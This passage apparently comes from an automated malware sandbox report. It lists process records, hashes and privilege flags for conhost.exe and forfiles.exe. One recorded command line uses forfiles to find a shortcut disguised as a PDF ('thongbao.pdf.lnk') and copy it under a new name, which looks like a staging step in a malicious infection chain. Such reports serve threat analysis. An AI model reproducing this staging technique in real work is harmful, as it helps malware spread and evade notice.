    Has exited:true

    Target ID:2
    Start time:00:59:01
    Start date:29/08/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff75da10000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:3
    Start time:00:59:02
    Start date:29/08/2024
    Path:C:\Windows\System32\forfiles.exe
    Wow64 process (32bit):false
    Commandline:forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf""
    Imagebase:0x7ff6bbfa0000
    File size:52'224 bytes
    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    No disassembly